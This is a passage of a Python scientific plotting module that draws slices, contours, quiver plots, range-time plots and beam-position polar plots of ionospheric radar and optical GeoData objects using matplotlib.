logging.info('problem plotting Optical slice {}'.format(e))
#%%
if isr is None or not np.isfinite(isr).any():
logging.warning('Nothing to plot for ISR, all NaN')
try:
top = ax.imshow(isr, alpha=0.4, extent=extent, origin='lower', interpolation='none',
vmin=vbounds[1][0], vmax=vbounds[1][1])
c = fg.colorbar(top,ax=ax)
c.set_label(key['isr'][0])
except Exception as e:
logging.info('Problem plotting slice {}'.format(e))
return ax
#%%
def alt_contour_overlay(geodatalist, altlist, xyvecs, vbounds, title, axis=None, picktimeind=[1, 2]):
"""
geodatalist - A list of geodata objects that will be overlayed, first object is on the bottom and in gray scale
altlist - A list of the altitudes that we can overlay.
xyvecs- A list of x and y numpy arrays that have the x and y coordinates that the data will be interpolated over.
vbounds = a list of bounds for each geodata object. ie, vbounds=[[500,2000], [5e10,5e11]]
title - A string that holds for the overall image
picktimeind - indices in time to extract and plot (arbitrary choice)
Returns an image of an overlayed plot at a specific altitude.
"""
ax = axis #less typing
opt, isr, extent, key, x, y = _dointerp(geodatalist, altlist, xyvecs, picktimeind)
#%% plots
if axis is None:
fg = plt.figure()
ax = fg.gca()
ax.set_title(title)
ax.set_xlabel('x')
ax.set_ylabel('y')
else:
fg = ax.get_figure()
#%%
try:
bottom = ax.imshow(opt, cmap='gray', extent=extent, origin='lower', interpolation='none',
vmin=vbounds[0][0], vmax=vbounds[0][1])
cbar1 = plt.colorbar(bottom, orientation='horizontal', ax=ax)
cbar1.set_label(key['opt'][0])
except Exception as e:
logging.info('problem plotting optical {}'.format(e))
try:
top = ax.contour(x, y, isr,extent=extent, origin='lower', interpolation='none',
vmin=vbounds[1][0], vmax=vbounds[1][1])
#clabel(top,inline=1,fontsize=10, fmt='%1.0e')
cbar2 = fg.colorbar(top, format='%.0e', ax=ax)
cbar2.set_label(key['isr'][0])
except Exception as e:
logging.info('problem plotting isr contour {}'.format(e))
return ax
def plot3Dslicempl(geodata, surfs, vbounds, titlestr='', time=0, gkey=None, cmap=defmap3d, ax=None, fig=None, method='linear',
fill_value=np.nan, view=None, units='', colorbar=False):
""" This function create 3-D slice image given either a surface or list of coordinates to slice through
Inputs:
geodata - A geodata object that will be plotted in 3D
surfs - This is a three element list. Each element can either be
altlist - A list of the altitudes that RISR parameter slices will be taken at
xyvecs- A list of x and y numpy arrays that have the x and y coordinates that the data will be interpolated over. ie, xyvecs=[np.linspace(-100.0,500.0),np.linspace(0.0,600.0)]
vbounds = a list of bounds for the geodata objec's parameters. ie, vbounds=[500,2000]
title - A string that holds for the overall image
ax - A handle for an axis that this will be plotted on.
Returns a mayavi image with a surface
"""
assert geodata.coordnames.lower() == 'cartesian'
datalocs = geodata.dataloc
xvec = sp.unique(datalocs[:, 0])
yvec = sp.unique(datalocs[:, 1])
zvec = sp.unique(datalocs[:, 2])
assert len(xvec)*len(yvec)*len(zvec) == datalocs.shape[0]
    # determine if the flattened coordinates use fortran- or c-style ordering
    ar_ord = 'c'  # fallback if the ordering cannot be determined below
    diffcoord = sp.diff(datalocs, axis=0)
    if diffcoord[0, 1] != 0.0:
        ar_ord = 'f'
    elif diffcoord[0, 2] != 0.0:
        ar_ord = 'c'
    elif diffcoord[0, 0] != 0.0:
        if len(np.where(diffcoord[:, 1])[0]) == 0:
            ar_ord = 'f'
        elif len(np.where(diffcoord[:, 2])[0]) == 0:
            ar_ord = 'c'
matshape = (len(yvec), len(xvec), len(zvec))
# reshape the arrays into a matricies for plotting
x, y, z = [sp.reshape(datalocs[:, idim], matshape, order=ar_ord) for idim in range(3)]
if gkey is None:
gkey = geodata.datanames()[0]
porig = geodata.data[gkey][:, time]
if fig is None:
fig = plt.figure()
    if ax is None:
        ax = fig.gca(projection='3d')
#determine if list of slices or surfaces are given
islists = isinstance(surfs[0], list)
if isinstance(surfs[0], np.ndarray):
onedim = surfs[0].ndim == 1
#get slices for each dimension out
surflist = []
if islists or onedim:
p = np.reshape(porig, matshape, order=ar_ord)
xslices = surfs[0]
for isur in xslices:
indx = sp.argmin(sp.absolute(isur-xvec))
xtmp = x[:, indx]
ytmp = y[:, indx]
ztmp = z[:, indx]
ptmp = p[:, indx]
cmapobj = cm.ScalarMappable(cmap=cmap)
cmapobj.set_array(ptmp)
cmapobj.set_clim(vbounds)
rgba = cmapobj.to_rgba(ptmp)
            # make NaNs transparent
rgba[np.isnan(ptmp), -1] = 0
surf_h = ax.plot_surface(xtmp, ytmp, ztmp, rstride=1, cstride=1,
facecolors=rgba, linewidth=0,
antialiased=False, shade=False)
surflist.append(surf_h)
yslices = surfs[1]
for isur in yslices:
indx = sp.argmin(sp.absolute(isur-yvec))
xtmp = x[indx]
ytmp = y[indx]
ztmp = z[indx]
ptmp = p[indx]
cmapobj = cm.ScalarMappable(cmap=cmap)
cmapobj.set_array(ptmp)
cmapobj.set_clim(vbounds)
rgba = cmapobj.to_rgba(ptmp)
            # make NaNs transparent
rgba[np.isnan(ptmp), -1] = 0
surf_h = ax.plot_surface(xtmp, ytmp, ztmp, rstride=1, cstride=1,
facecolors=rgba, linewidth=0,
antialiased=False, shade=False)
surflist.append(surf_h)
zslices = surfs[2]
for isur in zslices:
indx = sp.argmin(sp.absolute(isur-zvec))
xtmp = x[:, :, indx]
ytmp = y[:, :, indx]
ztmp = z[:, :, indx]
ptmp = p[:, :, indx]
cmapobj = cm.ScalarMappable(cmap=cmap)
cmapobj.set_array(ptmp)
cmapobj.set_clim(vbounds)
rgba = cmapobj.to_rgba(ptmp)
            # make NaNs transparent
rgba[np.isnan(ptmp), -1] = 0
surf_h = ax.plot_surface(xtmp, ytmp, ztmp, rstride=1, cstride=1,
facecolors=rgba, linewidth=0,
antialiased=False, shade=False)
surflist.append(surf_h)
else:
# For a general surface.
xtmp, ytmp, ztmp = surfs[:]
gooddata = ~np.isnan(porig)
curparam = porig[gooddata]
curlocs = datalocs[gooddata]
new_coords = np.column_stack((xtmp.flatten(), ytmp.flatten(), ztmp.flatten()))
ptmp = spinterp.griddata(curlocs, curparam, new_coords, method, fill_value)
cmapobj = cm.ScalarMappable(cmap=cmap)
cmapobj.set_array(ptmp)
cmapobj.set_clim(vbounds)
rgba = cmapobj.to_rgba(ptmp)
        # make NaNs transparent
rgba[np.isnan(ptmp), -1] = 0
surf_h = ax.plot_surface(xtmp, ytmp, ztmp, rstride=1, cstride=1,
facecolors=rgba, linewidth=0,
antialiased=False, shade=False)
surflist.append(surf_h)
ax.set_title(titlestr)
ax.set_xlabel('x in km')
ax.set_ylabel('y in km')
ax.set_zlabel('z in km')
if view is not None:
# order of elevation is changed between matplotlib and mayavi
ax.view_init(view[1],view[0])
if colorbar:
        if units == '':
            titlestr = gkey
        else:
            titlestr = gkey + ' in ' + units
        cbar = plt.colorbar(cmapobj, ax=ax, orientation='vertical')
        cbar.set_label(titlestr)  # apply the computed label (was unused due to a typo)
return surflist, cbar
else:
return surflist
def slice2DGD(geod, axstr, slicenum, vbounds=None, time=0, gkey=None, cmap=defmap,
fig=None, ax=None, title='', cbar=True, m=None):
"""
    This function creates a 2-D slice image given either a surface or a list of coordinates to slice through.
    Inputs:
    geodata - A geodata object that will be plotted.
    axstr - A string that specifies the plane that will be plotted.
    slicenum - The index location of that slice in the axis if the data were in a 3-D array.
    vbounds - A list of bounds for the geodata object's parameters. ie, vbounds=[500,2000]
    time - The time index that will be plotted.
    gkey - The name of the data that will be plotted.
    cmap - The color map to be used.
    fig - The figure handle that will be used.
    title - A string used as the title of the overall image.
    ax - A handle for an axis that this will be plotted on.
    cbar - A bool for creating the color bar, default =True.
    m - A handle for a map object if plotting over one.
    Outputs:
    ploth - The handle for the plotted image.
    cbar - The color bar handle for the image.
"""
#xyzvecs is the area that the data covers.
poscoords = ['cartesian','wgs84','enu','ecef']
assert geod.coordnames.lower() in poscoords
if geod.coordnames.lower() in ['cartesian','enu','ecef']:
axdict = {'x':0,'y':1,'z':2}
veckeys = ['x','y','z']
elif geod.coordnames.lower() == 'wgs84':
        axdict = {'lat':0,'long':1,'alt':2}# maps coordinate name to its column in dataloc
        veckeys = ['long','lat','alt']# which are the x, y and z axes for plotting
if type(axstr)==str:
axis=axstr
else:
axis= veckeys[axstr]
veckeys.remove(axis.lower())
veckeys.append(axis.lower())
datacoords = geod.dataloc
xyzvecs = {l:sp.unique(datacoords[:,axdict[l]]) for l in veckeys}
#make matrices
M1,M2 = sp.meshgrid(xyzvecs[veckeys[0]],xyzvecs[veckeys[1]])
slicevec = sp.unique(datacoords[:,axdict[axis]])
min_idx = sp.argmin(sp.absolute(slicevec-slicenum))
slicenum=slicevec[min_idx]
rec_coords = {axdict[veckeys[0]]:M1.flatten(),axdict[veckeys[1]]:M2.flatten(),
axdict[axis]:slicenum*sp.ones(M2.size)}
new_coords = sp.zeros((M1.size,3))
#make coordinates
for ckey in rec_coords.keys():
new_coords[:,ckey] = rec_coords[ckey]
#determine the data name
if gkey is None:
        gkey = list(geod.data.keys())[0]
# get the data location, first check if the data can be just reshaped then do a
# search
sliceindx = slicenum==datacoords[:,axdict[axis]]
datacoordred = datacoords[sliceindx]
rstypes = ['C','F','A']
nfounds = True
M1dlfl = datacoordred[:,axdict[veckeys[0]]]
M2dlfl = datacoordred[:,axdict[veckeys[1]]]
for ir in rstypes:
M1dl = sp.reshape(M1dlfl,M1.shape,order =ir)
M2dl = sp.reshape(M2dlfl,M1.shape,order =ir)
if sp.logical_and(sp.allclose(M1dl,M1),sp.allclose(M2dl,M2)):
nfounds=False
break
if nfounds:
dataout = geod.datareducelocation(new_coords,geod.coordnames,gkey)[:,time]
dataout = sp.reshape(dataout,M1.shape)
else:
dataout = sp.reshape(geod.data[gkey][sliceindx,time],M1.shape,order=ir)
title = insertinfo(title,gkey,geod.times[time,0],geod.times[time,1])
if (ax is None) and (fig is None):
fig = plt.figure(facecolor='white')
ax = fig.gca()
elif ax is None:
ax = fig.gca()
if m is None:
ploth = ax.pcolor(M1,M2,dataout,vmin=vbounds[0], vmax=vbounds[1],cmap = cmap,
linewidth=0,rasterized=True)
ploth.set_edgecolor('face')
ax.axis([xyzvecs[veckeys[0]].min(), xyzvecs[veckeys[0]].max(),
xyzvecs[veckeys[1]].min(), xyzvecs[veckeys[1]].max()])
if cbar:
cbar2 = plt.colorbar(ploth, ax=ax, format='%.0e')
else:
cbar2 = None
ax.set_title(title)
ax.set_xlabel(veckeys[0])
ax.set_ylabel(veckeys[1])
else:
N1,N2 = m(M1,M2)
ploth = m.pcolor(N1,N2,dataout,vmin=vbounds[0], vmax=vbounds[1],cmap = cmap,
alpha=.4,linewidth=0,rasterized=True)
if cbar:
cbar2 = m.colorbar(ploth, format='%.0e')
else:
cbar2 = None
return(ploth,cbar2)
def contourGD(geod,axstr,slicenum,vbounds=None,time = 0,gkey = None,cmap=defmap,
fig=None,ax=None,title='',cbar=True,m=None,levels=None):
""" """
poscoords = ['cartesian','wgs84','enu','ecef']
assert geod.coordnames.lower() in poscoords
if geod.coordnames.lower() in ['cartesian','enu','ecef']:
axdict = {'x':0,'y':1,'z':2}
veckeys = ['x','y','z']
elif geod.coordnames.lower() == 'wgs84':
        axdict = {'lat':0,'long':1,'alt':2}# maps coordinate name to its column in dataloc
        veckeys = ['long','lat','alt']# which are the x, y and z axes for plotting
if type(axstr)==str:
axis=axstr
else:
axis= veckeys[axstr]
veckeys.remove(axis.lower())
veckeys.append(axis.lower())
datacoords = geod.dataloc
xyzvecs = {l:sp.unique(datacoords[:,axdict[l]]) for l in veckeys}
#make matrices
M1,M2 = sp.meshgrid(xyzvecs[veckeys[0]],xyzvecs[veckeys[1]])
slicevec = sp.unique(datacoords[:,axdict[axis]])
min_idx = sp.argmin(sp.absolute(slicevec-slicenum))
slicenum=slicevec[min_idx]
rec_coords = {axdict[veckeys[0]]:M1.flatten(),axdict[veckeys[1]]:M2.flatten(),
axdict[axis]:slicenum*sp.ones(M2.size)}
new_coords = sp.zeros((M1.size,3))
#make coordinates
for ckey in rec_coords.keys():
new_coords[:,ckey] = rec_coords[ckey]
#determine the data name
if gkey is None:
        gkey = list(geod.data.keys())[0]
# get the data location, first check if the data can be just reshaped then do a
# search
sliceindx = slicenum==datacoords[:,axdict[axis]]
datacoordred = datacoords[sliceindx]
rstypes = ['C','F','A']
nfounds = True
M1dlfl = datacoordred[:,axdict[veckeys[0]]]
M2dlfl = datacoordred[:,axdict[veckeys[1]]]
for ir in rstypes:
M1dl = sp.reshape(M1dlfl,M1.shape,order =ir)
M2dl = sp.reshape(M2dlfl,M1.shape,order =ir)
if sp.logical_and(sp.allclose(M1dl,M1),sp.allclose(M2dl,M2)):
nfounds=False
break
if nfounds:
dataout = geod.datareducelocation(new_coords,geod.coordnames,gkey)[:,time]
dataout = sp.reshape(dataout,M1.shape)
else:
dataout = sp.reshape(geod.data[gkey][sliceindx,time],M1.shape,order=ir)
title = insertinfo(title,gkey,geod.times[time,0],geod.times[time,1])
if (ax is None) and (fig is None):
fig = plt.figure(facecolor='white')
ax = fig.gca()
elif ax is None:
ax = fig.gca()
if vbounds is None:
vbounds=[sp.nanmin(dataout),sp.nanmax(dataout)]
if levels is None:
levels=sp.linspace(vbounds[0],vbounds[1],5)
if m is None:
ploth = ax.contour(M1,M2,dataout,levels = levels,vmin=vbounds[0], vmax=vbounds[1],cmap = cmap)
ax.axis([xyzvecs[veckeys[0]].min(), xyzvecs[veckeys[0]].max(),
xyzvecs[veckeys[1]].min(), xyzvecs[veckeys[1]].max()])
if cbar:
cbar2 = plt.colorbar(ploth, ax=ax, format='%.0e')
else:
cbar2 = None
ax.set_title(title)
ax.set_xlabel(veckeys[0])
ax.set_ylabel(veckeys[1])
else:
N1,N2 = m(M1,M2)
ploth = ax.contour(N1,N2,dataout,levels = levels,vmin=vbounds[0], vmax=vbounds[1],cmap = cmap)
if cbar:
#cbar2 = m.colorbar(ploth, format='%.0e')
cbar2 = m.colorbar(ploth)
else:
cbar2 = None
return(ploth,cbar2)
def scatterGD(geod,axstr,slicenum,vbounds=None,time = 0,gkey = None,cmap=defmap,fig=None,
ax=None,title='',cbar=True,err=.1,m=None):
""" This will make a scatter plot given a GeoData object."""
poscoords = ['cartesian','wgs84','enu','ecef']
assert geod.coordnames.lower() in poscoords
if geod.coordnames.lower() in ['cartesian','enu','ecef']:
axdict = {'x':0,'y':1,'z':2}
veckeys = ['x','y','z']
elif geod.coordnames.lower() == 'wgs84':
        axdict = {'lat':0,'long':1,'alt':2}# maps coordinate name to its column in dataloc
        veckeys = ['long','lat','alt']# which are the x, y and z axes for plotting
if type(axstr)==str:
axis=axstr
else:
axis= veckeys[axstr]
#determine the data name
if gkey is None:
        gkey = list(geod.data.keys())[0]
geod=geod.timeslice(time)
veckeys.remove(axis.lower())
veckeys.append(axis.lower())
datacoords = geod.dataloc
xyzvecs = {l:sp.unique(datacoords[:,axdict[l]]) for l in veckeys}
xyzvecsall = {l:datacoords[:,axdict[l]] for l in veckeys}
if geod.issatellite():
zdata = xyzvecsall[veckeys[2]]
indxnum = np.abs(zdata-slicenum)<err
xdata =xyzvecsall[veckeys[0]][indxnum]
ydata =xyzvecsall[veckeys[1]][indxnum]
dataout = geod.data[gkey][indxnum]
title = insertinfo(title,gkey,geod.times[:,0].min(),geod.times[:,1].max())
else:
#make matrices
xvec = xyzvecs[veckeys[0]]
yvec = xyzvecs[veckeys[1]]
M1,M2 = sp.meshgrid(xvec,yvec)
slicevec = sp.unique(datacoords[:,axdict[axis]])
min_idx = sp.argmin(sp.absolute(slicevec-slicenum))
slicenum=slicevec[min_idx]
rec_coords = {axdict[veckeys[0]]:M1.flatten(),axdict[veckeys[1]]:M2.flatten(),
axdict[axis]:slicenum*sp.ones(M2.size)}
new_coords = sp.zeros((M1.size,3))
xdata = M1.flatten()
ydata= M2.flatten()
#make coordinates
for ckey in rec_coords.keys():
new_coords[:,ckey] = rec_coords[ckey]
# get the data location, first check if the data can be just reshaped then do a
# search
sliceindx = slicenum==datacoords[:,axdict[axis]]
datacoordred = datacoords[sliceindx]
rstypes = ['C','F','A']
nfounds = True
M1dlfl = datacoordred[:,axdict[veckeys[0]]]
M2dlfl = datacoordred[:,axdict[veckeys[1]]]
for ir in rstypes:
M1dl = sp.reshape(M1dlfl,M1.shape,order =ir)
M2dl = sp.reshape(M2dlfl,M1.shape,order =ir)
if sp.logical_and(sp.allclose(M1dl,M1),sp.allclose(M2dl,M2)):
nfounds=False
break
if nfounds:
dataout = geod.datareducelocation(new_coords,geod.coordnames,gkey)[:,time]
dataout = sp.reshape(dataout,M1.shape)
else:
dataout = sp.reshape(geod.data[gkey][sliceindx,time],M1.shape,order=ir)
title = insertinfo(title,gkey,geod.times[time,0],geod.times[time,1])
if (ax is None) and (fig is None):
fig = plt.figure(facecolor='white')
ax = fig.gca()
elif ax is None:
ax = fig.gca()
if m is None:
ploth = ax.scatter(xdata,ydata,c=dataout,vmin=vbounds[0], vmax=vbounds[1],cmap = cmap)
ax.axis([xyzvecs[veckeys[0]].min(), xyzvecs[veckeys[0]].max(),
xyzvecs[veckeys[1]].min(), xyzvecs[veckeys[1]].max()])
if cbar:
cbar2 = plt.colorbar(ploth, ax=ax, format='%.0e')
else:
cbar2 = None
ax.set_title(title)
ax.set_xlabel(veckeys[0])
ax.set_ylabel(veckeys[1])
else:
Xdata,Ydata = m(xdata,ydata)
ploth = m.scatter(Xdata,Ydata,c=dataout,vmin=vbounds[0], vmax=vbounds[1],cmap = cmap)
if cbar:
cbar2 = m.colorbar(ploth)
else:
cbar2 = None
return(ploth,cbar2)
def sliceGDsphere(geod,coordnames ='cartesian' ,vbounds=None,time = 0,gkey = None,cmap=defmap,fig=None,ax=None,title='',cbar=True):
assert geod.coordnames.lower() =='spherical'
if coordnames.lower() in ['cartesian','enu','ecef']:
veckeys = ['x','y','z']
elif coordnames.lower() == 'wgs84':
veckeys = ['lat','long','alt']
if (ax is None) and (fig is None):
fig = plt.figure(facecolor='white')
ax = fig.gca()
elif ax is None:
ax = fig.gca()
#determine the data name
if gkey is None:
        gkey = list(geod.data.keys())[0]
title = insertinfo(title,gkey,geod.times[time,0],geod.times[time,1])
xycoords = geod.__changecoords__(coordnames)
xvec = xycoords[:,0]
yvec = xycoords[:,1]
curdata =geod.data[gkey][:,time]
ploth = ax.tripcolor(xvec,yvec,curdata)
if cbar:
cbar2 = plt.colorbar(ploth, ax=ax, format='%.0e')
else:
cbar2 = None
ax.set_title(title)
ax.set_xlabel(veckeys[0])
ax.set_ylabel(veckeys[1])
return(ploth,cbar2)
def plotbeamposfig(geod,height,coordnames,fig=None,ax=None,title=''):
if (ax is None) and (fig is None):
fig = plt.figure(facecolor='white')
ax = fig.gca()
elif ax is None:
ax = fig.gca()
(beams,beaminds,beamnums) = uniquerows(geod.dataloc[:,1:])
az = beams[:,0]
el = beams[:,1]
rho = height*np.tan(np.radians((90-el)))
y = rho*np.cos(np.radians(az))
x = rho*np.sin(np.radians(az))
ploth = ax.scatter(x,y)
return(ploth)
def rangevstime(geod,beam,vbounds=(None,None),gkey = None,cmap=defmap,fig=None,ax=None,
title='',cbar=True,tbounds=(None,None),ic=True,ir=True,it=True):
"""
This method will create a color graph of range vs time for data in spherical coordinates
Inputs
geod -
"""
assert geod.coordnames.lower() =='spherical', 'I expect speherical coordinate data'
if (ax is None) and (fig is None):
fig = plt.figure(figsize=(12,8))
ax = fig.gca()
elif ax is None:
ax = fig.gca()
if gkey is None:
        gkey = list(geod.data.keys())[0]
#%% get unique ranges for plot limits, note beamid is not part of class.
match = np.isclose(geod.dataloc[:,1:],beam,atol=1e-2).all(axis=1) #TODO what should tolerance be for Sondrestrom mechanical dish
if (~match).all(): #couldn't find this beam
logging.error('beam az,el {} not found'.format(beam))
return
if not title:
title = gkey
dataout = geod.data[gkey][match]
rngval = geod.dataloc[match,0]
t = np.asarray(list(map(dt.datetime.utcfromtimestamp, geod.times[:,0])))
#%% time limits of display
ploth = ax.pcolormesh(t,rngval,dataout,
vmin=vbounds[0], vmax=vbounds[1],cmap = cmap)
if cbar:
fig.colorbar(ploth, ax=ax, format=sfmt)
if it:
ax.set_title(title)
if ic:
ax.set_ylabel('az,el = {} \n slant range [km]'.format(beam))
if ir:
ax.set_xlabel('UTC')
ttxt = tbounds[0].strftime('%Y-%m-%d') if tbounds[0] else t[0].strftime('%Y-%m-%d')
fig.suptitle(ttxt,fontsize='xx-large')
ax.autoscale(axis='y',tight=True) #fills axis
ax.xaxis.set_major_formatter(DateFormatter('%H:%M'))
ax.set_xlim(tbounds)
fig.autofmt_xdate()
return ploth
def rangevsparam(geod,beam,time_sel,gkey = None,gkeyerr=None,fig=None,ax=None,
title='',ic=True,ir=True,it=True,label=None):
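    """
    Plot a data parameter vs slant range for one beam at a single time index.
    If gkeyerr is given, it names the variable holding the error estimates
    and error bars are added; label is passed to the line for use in legends.
    """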
    assert geod.coordnames.lower() == 'spherical', 'expected spherical coordinate data'
if (ax is None) and (fig is None):
fig = plt.figure(figsize=(12,8))
ax = fig.gca()
elif ax is None:
ax = fig.gca()
    if gkey is None:
        gkey = list(geod.data.keys())[0]
#%% get unique ranges for plot limits, note beamid is not part of class.
match = np.isclose(geod.dataloc[:,1:],beam,atol=1e-2).all(axis=1) #TODO what should tolerance be for Sondrestrom mechanical dish
if (~match).all(): #couldn't find this beam
logging.error('beam az,el {} not found'.format(beam))
return
if not title:
title = gkey
dataout = geod.data[gkey][match]
rngval = geod.dataloc[match,0]
#t = np.asarray(list(map(dt.datetime.utcfromtimestamp, geod.times[:,0])))
ploth = ax.plot(dataout[:,time_sel],rngval,label=label)[0]
handlist = [ploth]
    if gkeyerr is not None:
dataouterr = geod.data[gkeyerr][match]
plotherr = ax.errorbar(dataout[:,time_sel],rngval,xerr=dataouterr[:,time_sel],fmt='-o',color=ploth.get_color())
handlist.append(plotherr)
if it:
ax.set_title(title)
if ic:
ax.set_ylabel('az,el = {} \n slant range [km]'.format(beam))
if ir:
ax.set_xlabel(gkey)
ax.autoscale(axis='y',tight=True) #fills axis
return handlist
def uniquerows(a):
    # view each row as a single opaque (void) element so np.unique can
    # compare whole rows at once
    b = np.ascontiguousarray(a).view(np.dtype((np.void, a.dtype.itemsize * a.shape[1])))
    (rowsinds, rownums) = np.unique(b, return_index=True, return_inverse=True)[1:]
    rows = a[rowsinds]
    return (rows, rowsinds, rownums)
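# Example (sketch):
#   a = np.array([[1, 2], [3, 4], [1, 2]])
#   rows, rowsinds, rownums = uniquerows(a)
# rows holds the unique rows, rowsinds their first indices in a, and rownums
# maps every row of a onto its entry in rows (here [0, 1, 0]).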
def plotbeamposGD(geod,title='Beam Positions',minel=30,elstep=10,fig=None,ax=None):
assert geod.coordnames.lower() =='spherical'
(azvec,elvec) = (geod.dataloc[:,1],geod.dataloc[:,2])
polarplot(azvec,elvec,markerarea=70,title=title,minel=minel,elstep=elstep,fig=fig,ax=ax)
def make_polax(zenith):
""" OBSOLETE
This makes the polar axes for the beams"""
if zenith:
minel = 0.0
maxel = 70.0
elspace = 10.0
ellines = np.arange(minel,maxel,elspace)
else:
minel = 30.0
maxel = 90.0
elspace = 10.0
ellines = np.arange(minel,maxel,elspace)
azlines = np.arange(0.0,360.0,30.0)
# plot all of the azlines
elvec = np.linspace(maxel,minel,100)
for iaz in azlines:
azvec = iaz*np.ones_like(elvec)
(xx,yy) = angles2xy(azvec,elvec,zenith)
plt.plot(xx,yy,'k--')
        # plt.hold was removed from matplotlib; repeated plot() calls overlay by default
(xt,yt) = angles2xy(azvec[-1],elvec[-1]-5,zenith)
plt.text(xt,yt,str(int(iaz)))
azvec = np.linspace(0.0,360,100)
# plot the el lines
for iel in ellines:
elvec = iel*np.ones_like(azvec)
(xx,yy) = angles2xy(azvec,elvec,zenith)
plt.plot(xx,yy,'k--')
(xt,yt) = angles2xy(315,elvec[-1]-3,zenith)
plt.text(xt,yt,str(int(iel)))
plt.axis([-90,90,-90,90])
frame1 = plt.gca()
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
def polarplot(az,el,markerarea=400,title=None,minel=30.,elstep=10.,fig=None,ax=None):
"""
plots hollow circles at az,el coordinates, with area quantitatively defined
Michael Hirsch from satkml
"""
az = np.radians(np.asarray(az).astype(float))
el = 90. - np.asarray(el).astype(float)
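    # polar axes measure radius from the center, so plot the zenith angle
    # (90 - el): zenith maps to the center, lower elevations plot farther out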
if fig is None:
fig = plt.figure()
if ax is None:
ax=fig.gca(polar=True)
ax.set_theta_zero_location('N')
# ax.set_rmax(90-minel)
ax.set_theta_direction(-1)
ax.scatter(x=az, y=el, marker='o',facecolors='none',
edgecolor='red',s=markerarea, linewidths=2)
yt = np.arange(0., 90.-minel+elstep, elstep)
ax.set_yticks(yt)
ylabel = (yt[::-1]+minel).astype(int).astype(str)
ax.set_yticklabels(ylabel)
ax.set_title(title,y=1.08)
return fig
#%%
# quiverGD() creates quiver plots from GeoData objects
# arrowscale sets the scale of the quiver plot vector arrows
def quiverGD(geod,axstr,slicenum,arrowscale,vbounds=None,time = 0,gkey = None,cmap='jet', fig=None,ax=None,title='',cbar=True,m=None):
poscoords = ['cartesian','wgs84','enu','ecef']
assert geod.coordnames.lower() in poscoords
if geod.coordnames.lower() in ['cartesian','enu','ecef']:
axdict = {'x':0,'y':1,'z':2}
veckeys = ['x','y','z']
elif geod.coordnames.lower() == 'wgs84':
axdict = {'lat':0,'long':1,'alt':2}# shows which row is this coordinate
veckeys = ['long','lat','alt']# shows which is the x, y and z axes for plotting
if type(axstr)==str:
axis=axstr
else:
axis= veckeys[axstr]
veckeys.remove(axis.lower())
veckeys.append(axis.lower())
datacoords = geod.dataloc
xyzvecs = {l:sp.unique(datacoords[:,axdict[l]]) for l in veckeys}
#make matrices
M1,M2 = sp.meshgrid(xyzvecs[veckeys[0]],xyzvecs[veckeys[1]])
slicevec = sp.unique(datacoords[:,axdict[axis]])
min_idx = sp.argmin(sp.absolute(slicevec-slicenum))
slicenum=slicevec[min_idx]
rec_coords = {axdict[veckeys[0]]:M1.flatten(),axdict[veckeys[1]]:M2.flatten(),
axdict[axis]:slicenum*sp.ones(M2.size)}
new_coords = sp.zeros((M1.size,3))
#make coordinates
for ckey in rec_coords.keys():
new_coords[:,ckey] = rec_coords[ckey]
    #determine the data name; quiverGD needs a pair of data keys, one for
    #each vector component (used below as gkey[0] and gkey[1])
    if gkey is None:
        gkey = list(geod.data.keys())[:2]
# get the data location, first check if the data can be just reshaped then do a
# search
sliceindx = slicenum==datacoords[:,axdict[axis]]
datacoordred = datacoords[sliceindx]
    rstypes = ['C','F','A']
    nfounds = True # stays True if no reshape order reproduces the mesh grids
M1dlfl = datacoordred[:,axdict[veckeys[0]]]
M2dlfl = datacoordred[:,axdict[veckeys[1]]]
for ir in rstypes:
M1dl = sp.reshape(M1dlfl,M1.shape,order =ir)
M2dl = sp.reshape(M2dlfl,M1.shape,order =ir)
if sp.logical_and(sp.allclose(M1dl,M1),sp.allclose(M2dl,M2)):
nfounds=False
break
if nfounds:
dx = geod.datareducelocation(new_coords,geod.coordnames,gkey[0])[:,time]
dy = geod.datareducelocation(new_coords,geod.coordnames,gkey[1])[:,time]
dx = sp.reshape(dx,M1.shape)
dy = sp.reshape(dy,M1.shape)
else:
dx = sp.reshape(geod.data[gkey[0]][sliceindx,time],M1.shape,order=ir)
dy = sp.reshape(geod.data[gkey[1]][sliceindx,time],M1.shape,order=ir)
title = insertinfo(title,gkey[0],geod.times[time,0],geod.times[time,1])
if (ax is None) and (fig is None):
fig = plt.figure(facecolor='white')
ax = fig.gca()
elif ax is None:
ax = fig.gca()
if m is None:
quiv = ax.quiver(M1,M2,dx,dy,scale=arrowscale)
ax.axis([xyzvecs[veckeys[0]].min(), xyzvecs[veckeys[0]].max(),
xyzvecs[veckeys[1]].min(), xyzvecs[veckeys[1]].max()])
ax.set_title(title)
ax.set_xlabel(veckeys[0])
ax.set_ylabel(veckeys[1])
    else:
        N1,N2 = m(M1,M2)
        quiv = ax.quiver(N1,N2,dx,dy,scale=arrowscale)
return(quiv)
def insertinfo(strin,key='',posix=None,posixend = None):
listin = isinstance(strin,list)
if listin:
stroutall = []
else:
strin=[strin]
for k in range(len(strin)):
strout = strin[k].replace('$k',key)
        if posix is None:
            # no time given: strip the time markers out of the string
            strout = strout.replace('$tdu','')
            strout = strout.replace('$tu','')
        else:
            curdt = time.gmtime(posix)
            curdte = time.gmtime(posixend)
markers = [
'$thmsehms',#UT hours minutes seconds - hours minutes seconds
'$thmehm',#UT hours minutes - hours minutes
'$tmsems',#UT minutes seconds - minutes seconds
'$thms',#UT hours minutes seconds
'$thm',#UT hours minutes
'$tms',#UT minutes seconds
'$tmdyhms',#UT month/day/year hours minutes seconds
'$tmdyhm',#UT month/day/year hours minutes
'$tmdy',#UT month/day/year
'$tmdhm'#UT month/day hours minutes
]
datestrcell = [
time.strftime('%H:%M:%S',curdt)+' - '+time.strftime('%H:%M:%S',curdte)+' UT',
time.strftime('%H:%M',curdt)+' - '+time.strftime('%H:%M',curdte)+' UT',
time.strftime('%M:%S',curdt)+' - '+time.strftime('%M:%S',curdte)+' UT',
time.strftime('%H:%M:%S',curdt)+' UT',
time.strftime('%H:%M',curdt)+' UT',
time.strftime('%M:%S',curdt)+' UT',
time.strftime('%m/%d/%Y %H:%M:%S',curdt)+' UT',
time.strftime('%m/%d/%Y %H:%M',curdt)+' UT',
time.strftime('%m/%d/%Y',curdt),
time.strftime('%m/%d %H:%M',curdt)+' UT']
for imark in range(len(markers)):
                strout = strout.replace(markers[imark],datestrcell[imark])
        if listin:
            stroutall.append(strout)
else:
stroutall = strout
return stroutall
def plotazelscale(opt,az=None,el=None):
"""
diagnostic: plots az/el map over test image
Michael Hirsch
"""
if isinstance(opt,GeoData):
img = opt.data['optical'][0,...]
